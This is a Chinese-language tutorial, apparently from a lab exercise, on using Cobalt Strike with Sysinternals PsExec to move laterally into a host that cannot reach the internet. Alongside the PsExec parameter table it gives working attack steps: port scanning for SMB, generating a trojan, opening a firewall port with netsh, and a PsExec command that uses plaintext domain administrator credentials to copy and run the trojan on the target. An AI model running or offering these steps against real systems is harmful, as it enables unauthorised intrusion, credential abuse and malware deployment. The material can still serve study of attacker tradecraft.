Cobaltstrike主机上线psexec传递

Psexec 简介

诸如Telnet之类的实用程序和诸如Symantec PC Anywhere之类的远程控制程序使您可以在远程系统上执行程序，但是设置起来很麻烦，并且要求您在希望访问的远程系统上安装客户端软件。PsExec是一种轻巧的telnet替代品，可让您在其他系统上执行进程，并为控制台应用程序提供完整的交互性，而无需手动安装客户端软件。PsExec最强大的用途包括在远程系统上启动交互式命令提示符，以及IpConfig之类的远程支持工具，否则它们将无法显示有关远程系统的信息。

下载地址https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

相关参数

参数	描述
-a	应用程序可以使用逗号分隔的单独处理器，其中1是编号最小的CPU。例如，要在CPU 2和CPU 4上运行该应用程序，请输入：“ -a 2,4”
-c	将指定的可执行文件复制到远程系统以执行。如果省略此选项，则应用程序必须位于远程系统的系统路径中。
-d	不要等待进程终止（非交互式）
-e	不加载指定帐户的配置文件
-f	即使文件已存在于远程系统上，也要复制指定的程序
-h	如果目标系统是Vista或更高版本，请使用该帐户的提升令牌运行该过程（如果有）
-i	运行程序，使其与远程系统上指定会话的桌面进行交互。如果未指定会话，则该过程在控制台会话中运行
-l	以受限用户身份运行进程（剥离Administrators组，仅允许分配给Users组的特权），在Windows Vista上，该过程以低完整性运行
-n	指定连接到远程计算机的超时（以秒为单位）
p	指定用户名的可选密码。如果您忽略此密码，系统将提示您输入隐藏密码
-r	指定要创建或与之交互的远程服务的名称
-s	在系统帐户中运行远程进程
-u	指定用于登录到远程计算机的可选用户名
-v	仅当指定文件的版本号更高或比远程系统上的版本新时，才复制该文件
-w	设置进程的工作目录（相对于远程计算机）
-x	在Winlogon安全桌面（仅本地系统）上显示UI
-priority	指定-low，-belownormal，-abovenormal，-high或-realtime以不同的优先级运行进程。使用-background在Vista上以低内存和I / O优先级运行
computer	指示PsExec在远程计算机或指定的计算机上运行该应用程序。如果省略计算机名，则PsExec将在本地系统上运行该应用程序，并且如果指定通配符（\ *），则PsExec将在当前域中的所有计算机上运行命令
@file	PsExec将在文件中列出的每台计算机上执行命令
cmd	要执行的应用程序的名称
arguments	要传递的参数（请注意，文件路径必须是目标系统上的绝对路径）
-accepteula	该标志禁止显示许可证对话框

0x01 可出网受害主机上线

通过web漏洞拿到shell之后 让主机上线并提升到system权限 再拿到密码

0x02 扫描445端口开放的主机

portscan 网段 端口 协议（icmp arp none）线程
portscan 192.168.138.0/24 445 arp 50

0x03 以可出网主机为listener

看一下监听情况

0x04生成木马并传递

生成木马

把psexec和木马传递到可出网主机

0x05 添加防火墙规则

由于开了防火墙不可出网主机连接不到listener 需要加一条规则 我们这里用netsh
netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=8888

0x06攻击不可出网主机

shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \192.168.138.138 -u sun\Administrator -p dc123.com -d -c C:\phpStudy\PHPTutorial\WWW\public\why.exe

可以看到不能出网主机已经上线

弊端

用此方法后会在服务里留下一个PSEXESVC服务，留下痕迹